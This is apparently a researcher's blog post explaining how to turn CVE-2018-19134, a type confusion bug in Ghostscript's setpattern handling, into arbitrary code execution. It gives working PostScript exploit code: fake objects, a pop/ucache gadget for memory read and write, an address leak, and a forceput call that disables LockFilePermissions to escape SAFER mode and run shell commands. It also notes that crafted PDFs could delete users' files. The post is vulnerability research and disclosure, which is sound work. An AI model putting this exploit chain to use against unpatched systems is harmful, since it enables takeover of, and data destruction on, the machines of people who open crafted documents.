In this post I’ll show how to construct an arbitrary code execution exploit for CVE-2018-19134, a vulnerability caused by type confusion. I discovered CVE-2018-19134 (alongside 3 other CVEs in Ghostscript) back in November 2018. If you’d like to know more about how I used our CodeQL technology to perform variant analysis in order to find these vulnerabilities (and how you can do so yourself!), please have a look at my previous blog post.
The vulnerability
Let’s first briefly recap the vulnerability. Recall that PostScript objects are represented as the type ref_s (or more commonly ref, which is a typedef of ref_s).
struct ref_s {
    struct tas_s tas;
    union v {
        ps_int intval;
        ...
        uint64_t dummy;
    } value;
};
This is a 16-byte structure in which tas_s occupies the first 8 bytes, containing the type information as well as the size for array, string, dictionary, etc.:
struct tas_s {
    ushort type_attrs;
    ushort _pad;
    uint32_t rsize;
};
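The layout described above can be checked with a small C sketch. The struct names below are simplified stand-ins rather than the real Ghostscript definitions, and the sketch assumes that ps_int is 64 bits wide and that the union also holds a pointer member.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-ins for Ghostscript's tas_s and ref_s (hypothetical names). */
struct sketch_tas {
    uint16_t type_attrs;  /* type and access attributes */
    uint16_t _pad;
    uint32_t rsize;       /* size for arrays, strings, dictionaries */
};

struct sketch_ref {
    struct sketch_tas tas;
    union {
        int64_t  intval;   /* assumes a 64-bit ps_int */
        void    *pstruct;  /* pointer payload, as read by r_ptr */
        uint64_t dummy;
    } value;
};

/* Returns the byte offset of the value field, after checking the sizes. */
size_t sketch_value_offset(void)
{
    assert(sizeof(struct sketch_tas) == 8);
    assert(sizeof(struct sketch_ref) == 16);
    return offsetof(struct sketch_ref, value);
}
```

Calling sketch_value_offset() returns 8: the metadata occupies bytes 0 to 7 and the payload bytes 8 to 15.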
The vulnerability I found is the result of a missing type check in the function zsetcolor: the type of pPatInst was not checked before interpreting it as a gs_pattern_instance_t.
static int
zsetcolor(i_ctx_t * i_ctx_p)
{
    ...
    if ((n_comps = cs_num_components(pcs)) < 0) {
        n_comps = -n_comps;
        if (r_has_type(op, t_dictionary)) {
            ref *pImpl, pPatInst;
            if ((code = dict_find_string(op, "Implementation", &pImpl)) < 0)
                return code;
            if (code > 0) {
                code = array_get(imemory, pImpl, 0, &pPatInst); //<--- Reported by Tavis Ormandy
                if (code < 0)
                    return code;
                cc.pattern = r_ptr(&pPatInst, gs_pattern_instance_t); //<--- What's the type of &pPatInst?!
                n_numeric_comps = ( pattern_instance_uses_base_space(cc.pattern) ? n_comps - 1 : 0);
Here, r_ptr is a macro in iref.h:
#define r_ptr(rp,typ) ((typ *)((rp)->value.pstruct))
The value of pstruct originates from PostScript, and is therefore controlled by the user. For example, the following input to setpattern (which calls zsetcolor under the hood) will result in pPatInst.value.pstruct evaluating to 0x41.
<< /Implementation [16#41] >> setpattern
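The effect of the missing type check can be reproduced in miniature. The following C sketch uses a hypothetical, simplified value union and a macro with the same shape as r_ptr; it assumes a little-endian platform such as x86-64 and is only an illustration, not Ghostscript code.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical, simplified value union of a ref. */
union sketch_value {
    int64_t intval;   /* what an integer object stores */
    void   *pstruct;  /* what r_ptr reads */
};

/* Same shape as the r_ptr macro quoted above, applied to the sketch union. */
#define SKETCH_R_PTR(vp, typ) ((typ *)((vp)->pstruct))

/* Stores an integer, then reads it back as a pointer without a type check. */
uintptr_t sketch_confused_pointer(int64_t user_int)
{
    union sketch_value v;
    v.pstruct = 0;
    v.intval = user_int;
    return (uintptr_t)SKETCH_R_PTR(&v, char);
}
```

sketch_confused_pointer(0x41) yields the pointer value 0x41, which is what happens to the integer 16#41 in the PostScript input.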
Following the code into pattern_instance_uses_base_space, I see that the object that I control is now the pointer pinst, which the code interprets as a gs_pattern_instance_t pointer:
pattern_instance_uses_base_space(const gs_pattern_instance_t * pinst)
{
    return pinst->type->procs.uses_base_space(
        pinst->type->procs.get_pattern(pinst) );
}
So it looks like I may be able to control two function pointers, get_pattern and uses_base_space, as well as the argument pinst that is passed to get_pattern.
Creating a fake object
Let’s see exactly how much of pinst is under my control. The PostScript type array is particularly useful here, as its value stores a ref pointer that points to the start of a ref array. This allows me to create a buffer pointed to by value, whose contents I can control:
In the above, a grey box indicates data that I have partial control of (I cannot control type_attrs and _pad in tas completely); green indicates the data that I have complete control of. The crucial point here is that both value in a ref and type in a gs_pattern_instance_t have an offset of 8 bytes. This means that procs in pinst->type->procs will be the underlying PostScript array that is partially under my control. It turns out that I can indeed control both the function pointers get_pattern and uses_base_space by using nested arrays:
GS><</Implementation [[16#41 [16#51 16#52]]] >> setpattern
This sets pinst to the array [16#41 [16#51 16#52]] and results in:
This shows I indeed have full control over both uses_base_space and get_pattern. The next step: how do I use an arbitrary function pointer to achieve code execution?
8 bytes off an easy exploit
I decided to start with getting any valid function pointer. In Ghostscript, built-in PostScript operators are represented by the type t_operator. As a ref, its value is an op_proc_t, which is a function pointer. These can be reached by looking the operators up in systemdict by name:
GS>systemdict /put get ==
GS>--put--
So let’s try to put some built-in functions in our fake array:
/arr 100 array def
systemdict /put get arr exch 1 exch put
systemdict /get get arr exch 0 exch put
<</Implementation [[16#41 arr]] >> setpattern
I’ll be using the following PostScript instructions rather a lot: systemdict <foo> get <arr> exch <idx> exch put. This fetches foo from systemdict and stores it in array arr at index idx. There may be a better way of achieving that, but keep in mind that I had never written a line of PostScript before I found these vulnerabilities, so please bear with me.
Indeed, I can now call the zget and zput C functions directly, instead of uses_base_space and get_pattern:
So now I can call functions that I could already call from PostScript anyway. What did I gain? The point here is that I also control the arguments to these functions, in C. When the underlying C function is called from PostScript, an execution context is passed to the C function as its argument. This context, represented by the type i_ctx_t (an alias of gs_context_state_s; they do like their typedefs!), contains a lot of information that cannot be controlled from PostScript, including important security settings such as LockFilePermissions:
struct gs_context_state_s {
    ...
    bool LockFilePermissions; /* accessed from userparams */
    ...
    /* Put the stacks at the end to minimize other offsets. */
    dict_stack_t dict_stack;
    exec_stack_t exec_stack;
    op_stack_t op_stack;
    struct i_plugin_holder_s *plugin_list;
};
When calling operators from PostScript, the arguments passed to the operator are stored in op_stack. By calling these functions from C directly and having control of the argument i_ctx_p, we’ll be able to call functions as if Ghostscript were running without -dSAFER mode switched on.
So let’s try to create a PostScript array to fake the context i_ctx_t object. PostScript function arguments are stored in i_ctx_p->op_stack.stack.p, which is a ref pointer that points to the argument. In order to call PostScript functions with a fake context, I’ll need to control p. The offset of p from i_ctx_p is the same as the offset of op_stack, which is 0x270. As each ref is of size 0x10, this corresponds to the element at index 39 (0x270 / 0x10 = 39) of the fake ref array:
As seen from the diagram, this alignment is not ideal. The op_stack.stack.p field corresponds to the tas part of my array element, which I don’t control completely. If only op_stack corresponded to a value field of a ref, I would have succeeded. What’s more, tas stores the metadata of a ref, so even if I had full control of it, I wouldn’t be able to set it to the address of an arbitrary object without first knowing that address. As most PostScript functions dereference the operand pointer, any exploit will most likely just crash Ghostscript at this point. This looks like a show-stopper.
Getting arbitrary read and write primitives
The idea now is to find a PostScript function that:
- Does not dereference the osp (op_stack.stack.p) pointer;
- Still does something “useful” to osp;
- Is available in SAFER mode.
Stack operators come to mind. The pop operator is particularly interesting:
zpop(i_ctx_t *i_ctx_p)
{
    os_ptr op = osp;
    check_op(1);
    pop(1);
    return 0;
}
It checks the value of the stack pointer against the bottom of the stack with check_op, which compares osp against the pointer osbot. If osp is greater than osbot, pop then decreases the value of osp. It is a simple function that does not dereference osp, yet it changes its value. To see what I can gain from this, let’s take a closer look at the structure of ref and op_stack side by side:
Recall that in our fake object, op_stack is faked by element 39 of a ref array, which is itself a ref. As you can see in the image above, the field tas corresponds to p, while value corresponds to osbot. In particular, the three fields type_attrs, _pad and rsize combine to form the pointer p in op_stack. As explained before, type_attrs specifies the type of the ref object, as well as its accessibility. So by using pop, I can modify both the type and accessibility of an object of my choice! One catch though: pop only works if p is larger than osbot, which is the address of this ref object. So in order for this to work, the object that I am tampering with needs to be a string, array or dictionary that is large enough, so that rsize, which gives the top bytes of p, combines with the other fields to give something that is greater than the address of most ref objects. This prevents me from just modifying the accessibility of built-in read-only objects like systemdict to gain write access. Still, there are at least a couple of things that I can do:
- I can “convert” an array into a string this way, which will then treat the internal ref array as a byte array (i.e. the ref pointer in the value field of this array is now treated as a byte buffer of the same length). This allows me to read and write the in-memory representation of any object that I put into the array. This is very powerful, as strings in PostScript are not terminated by a null character, but rather treated as a byte buffer of the length specified by rsize, so any byte can be read from or written to the buffer. Note that this does not give me any out-of-bounds (OOB) read/write, as the resulting string will have the same length as the original array, but since each ref is 16 bytes, the resulting byte buffer will only cover about 1/16 of the buffer originally allocated for the ref array. This is what I’m going to do in the exploit.
- I can of course do it the other way round and “convert” a string into an array of the same length. As explained above, the resulting ref array will be about 16 times larger than the original string, which allows me to do OOB reads and writes. I have not pursued this route.
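To make the size constraint on rsize concrete, the following C sketch views the 8 bytes of tas as one little-endian 64-bit value, the way they would be read as the pointer p on x86-64, and compares it with a candidate osbot. The function names are hypothetical, the type_attrs value 0x0400 is an assumed placeholder, and the comparison mirrors the description above rather than the exact check_op macro.

```c
#include <assert.h>
#include <stdint.h>

/* View the 8 tas bytes as one little-endian 64-bit value (assumes x86-64):
 * type_attrs is the low 16 bits, _pad the next 16, rsize the top 32. */
uint64_t sketch_tas_as_pointer(uint16_t type_attrs, uint16_t pad, uint32_t rsize)
{
    return (uint64_t)type_attrs | ((uint64_t)pad << 16) | ((uint64_t)rsize << 32);
}

/* pop only decrements osp when it is above osbot; mirror that comparison. */
int sketch_pop_allowed(uint64_t p, uint64_t osbot)
{
    return p > osbot;
}
```

With rsize = 32767 (0x7fff), sketch_tas_as_pointer(0x0400, 0, 32767) gives 0x00007fff00000400. A made-up address such as 0x7f0012345000 lies below that value and passes the comparison, whereas an address such as 0x7ffff0a35078 lies above it and does not.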
There is one more technical difficulty that I need to overcome. The fake object pinst actually calls two functions, with the output of one feeding into the other:
    return pinst->type->procs.uses_base_space(
        pinst->type->procs.get_pattern(pinst) );
As seen from above, uses_base_space takes the return value of pinst->type->procs.get_pattern(pinst), which is now zpop(pinst), as its input. As zpop returns 0, this is likely to cause a null pointer dereference when I use any built-in PostScript operator in place of uses_base_space, unless I can find an operator that doesn’t use the context pointer i_ctx_p at all.
If only there existed a query language I could use to find particular patterns in a codebase! Here’s the query I used to find the operator I was looking for:
import cpp

from Function f
where
  f.getName().matches("z%") and
  f.getFile().getAbsolutePath().matches("%/psi/%") and
  // Look for functions with a single parameter of the right type:
  f.getNumberOfParameters() = 1 and f.getParameter(0).getType().hasName("i_ctx_t *") and
  // Make sure the function is actually defined:
  exists(Stmt stmt | stmt.getEnclosingFunction() = f) and
  // And doesn't access `i_ctx_p`
  not exists(FieldAccess fa, Function f2 |
    fa.getQualifier().getType().hasName("i_ctx_t *") and
    fa.getEnclosingFunction() = f2 and f.calls*(f2)
  )
  // And doesn't dereference `i_ctx_p`
  and not exists(PointerDereferenceExpr expr, Variable v, Function f2 |
    expr.getAnOperand() = v.getAnAccess() and
    v.getType().hasName("i_ctx_t *") and
    expr.getEnclosingFunction() = f2 and
    f.calls*(f2)
  )
select f
My query uses some heuristics to identify PostScript operators. Their names normally start with z and they are defined inside the psi directory. They also take an argument of type i_ctx_t *. I then look for functions that neither dereference the argument nor access its fields, either directly or in functions that they call. This query does not look for dereferences of the parameter i_ctx_p specifically, but of any variable of type i_ctx_t *, which is a good enough approximation.
You can run your own queries on over 130,000 GitHub, Bitbucket, and GitLab projects using CodeQL.
[EDIT]: You can also use our free CodeQL extension for Visual Studio Code. See installation instructions at https://securitylab.github.com/tools/codeql/.
Ghostscript is not developed on GitHub, Bitbucket, or GitLab. You can create a Ghostscript code snapshot as a database using the CodeQL CLI.
This query gives me 6 results:
The function ucache seems to be just what we need. Let’s try to put this together and see if it works. First set up the fake object pinst:
%Create the fake array pinst
/pinst 100 array def
%array that stores the pop-ucache gadget
/pop_ucache 100 array def
%put pop into pop_ucache to cause more type confusions by decrementing osp
systemdict /pop get pop_ucache exch 1 exch put
%put ucache in (no op) to avoid crash
systemdict /ucache get pop_ucache exch 0 exch put
%replace the functions with pop and ucache
pinst 1 pop_ucache put
Now we need to create a large array object and store it at index 39 of pinst. Its metadata tas will then be interpreted as the stack pointer osp. I’ll use the PostScript operator put as its first element, then use pop to change its type to string and read off the address of the zput function.
%make a large enough array and change its type with pop
/arr 32767 array def
%get the address of the put operator
systemdict /put get arr exch 0 exch put
%store arr as 39th element of pinst and modify its type
pinst 39 arr put
%Create the argument to setpattern
/impl 100 dict def
impl /Implementation [pinst] put
%Change type of arr to string
0 1 1291 {impl setpattern} for
% Print the address of zput as string
pinst 39 get 8 8 getinterval
It is a bit unfortunate that the type_attrs value for array is 0x4 while the value for string is 0x12, so I have to underflow the ushort to go from array to string, which is why I have to do impl setpattern 1291 times.
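The underflow can be illustrated with a C sketch that looks only at the low 16 bits of the pointer, i.e. the type_attrs field. It assumes that the type occupies the high byte of type_attrs (an assumption about Ghostscript's layout that is not stated above) and that every pop moves osp down by one ref, i.e. 16 bytes. The function name is hypothetical, and how many pops a single setpattern call performs is not modelled, so the result is not directly comparable to the loop bound.

```c
#include <assert.h>
#include <stdint.h>

#define SKETCH_REF_SIZE 16u  /* each pop moves osp down by one ref */

/* Counts 16-byte decrements until the high byte of type_attrs equals
 * target_type. Assumes the type lives in the high byte of type_attrs. */
unsigned sketch_pops_until_type(uint16_t type_attrs, uint8_t target_type)
{
    unsigned pops = 0;
    while ((type_attrs >> 8) != target_type) {
        /* The cast makes the subtraction wrap around below zero. */
        type_attrs = (uint16_t)(type_attrs - SKETCH_REF_SIZE);
        pops++;
    }
    return pops;
}
```

Starting from a type_attrs of 0x0400 (type 0x4 with all attribute bits assumed clear), the value first passes through 0x0000, wraps to 0xFFF0, and only then descends to 0x12F0, after 3857 decrements in total. Going from 0x4 "up" to 0x12 by subtraction therefore costs almost a full trip around the 16-bit range.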
As can be seen in the screenshot above, the fake array gets converted into a string and I get the address of zput. I actually have to run it outside of gdb, or at least enable address randomization, to get it to work, as gdb seems to always allocate arr at 0x7ffff0a35078, but with memory randomization, I’ve not failed a single time with the above. I can also use this to write bytes to any position in arr.
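The 8 bytes returned by getinterval are the raw in-memory bytes of the value field. As a minimal sketch, assuming a little-endian x86-64 target, they can be turned back into an address as follows; the function name is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Decodes 8 leaked bytes as a little-endian 64-bit address (assumes x86-64). */
uint64_t sketch_decode_le64(const unsigned char bytes[8])
{
    uint64_t addr = 0;
    for (size_t i = 0; i < 8; i++)
        addr |= (uint64_t)bytes[i] << (8 * i);  /* byte 0 is least significant */
    return addr;
}
```

For instance, the byte sequence 78 50 a3 f0 ff 7f 00 00 decodes to 0x7ffff0a35078. Writing an address back into the string is the same operation in reverse, one byte at a time.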
Sandbox bypass
Now that I can read and write arbitrary bytes from an arbitrary PostScript object, it is just a matter of deciding what is the easiest thing to do. My original plan was to simply overwrite the LockFilePermissions parameter, and then call file, which would allow arbitrary command execution, like I did with CVE-2018-19475. However, it turns out that in order for this to work, I also need to fake a number of other objects in the execution context i_ctx_p, which seems too complicated. Instead, I’m just going to call a simple but powerful function that I am not supposed to have access to in SAFER mode, then use it to overwrite some security settings, which will then allow me to run arbitrary shell commands. The operator forceput (also used by Tavis Ormandy in one of his Ghostscript vulnerabilities) fits the bill nicely.
Summarizing, here is what I need to do now:
1. Create a fake operand stack with the arguments that I want to supply to forceput;
2. Overwrite the location in pinst that stores the operand stack pointer with the address of what I created above;
3. Get the address of forceput and replace pinst->type->procs.get_pattern with it.
To achieve (1), recall that the operand stack is nothing more than an array of ref. To fake it, I just need to create an array with my arguments:
/operand 3 array def
operand 0 userparams put
operand 1 /LockFilePermissions put
operand 2 false put
I can then store it in arr to retrieve the address of this array. Instead of using arr, I’m just going to reuse pinst and put it at index 31 instead:
pinst 31 operand 2 1 getinterval put
Note that instead of putting operand itself at index 31 of pinst, I create a new array starting from operand[2] and use that new array. This is because PostScript functions look for their arguments by going down the operand stack, so I need to set it up so that when osp decreases, it reaches my other arguments.
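Why the pointer has to refer to the last argument can be shown with a much simplified C model of the fake stack. Everything here is hypothetical: the operand struct only carries a label, and the real operator of course reads full ref objects.

```c
#include <assert.h>

/* Hypothetical, much simplified operand: just a label for illustration. */
struct sketch_operand {
    const char *label;
};

/* The three arguments in the order they were stored in the operand array. */
static const struct sketch_operand sketch_stack[3] = {
    { "userparams" }, { "/LockFilePermissions" }, { "false" }
};

/* The fake stack pointer refers to the last element, like operand[2]. */
const struct sketch_operand *sketch_top(void)
{
    return &sketch_stack[2];
}

/* Operators read their arguments downwards from the stack pointer:
 * depth 0 is the top, depth 2 is the first argument that was pushed. */
const char *sketch_operand_at(const struct sketch_operand *op, int depth)
{
    return op[-depth].label;
}
```

With this arrangement, sketch_operand_at(sketch_top(), 2) is the userparams entry and depth 0 is the value false. A pointer to the start of the array would instead make the operator read memory below the array.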
Using the trick in the previous section, I can now read off the address of this fake stack pointer and write it to the appropriate location in pinst. This then sets up pinst for calling forceput. Although forceput is not accessible from SAFER mode, I can simply take the address of zput and add the offset between zput and zforceput to obtain the address of zforceput (as this offset is not randomized). In the debug binary compiled with commit 81f3d1e, this offset is 0x437, and in the release binary compiled with the same commit, or in the release code of 9.25, this offset is 0x4B0. After doing this, I can simply call restore to write the new LockFilePermissions parameter to the current device, and then run an arbitrary shell command (again, remember to turn address randomization ON). Here’s a screenshot of the launching of a calculator from sandboxed Ghostscript:
By overwriting other entries in userparams, such as PermitFileReading and PermitFileWriting, it is also possible to gain arbitrary file access. Systems like AppArmor may be effective at preventing PDF viewers from starting arbitrary shell commands, but they don’t stop a specially-crafted PDF file from wiping a user’s entire home directory when opened. Or, if you’re in a more forgiving mood, you could delete all files from a user’s desktop and subsequently flood it with Super Mario bricks:
https://youtube.com/watch?v=5vVxN-vfCsI
Note: Post originally published on LGTM.com on February 05, 2019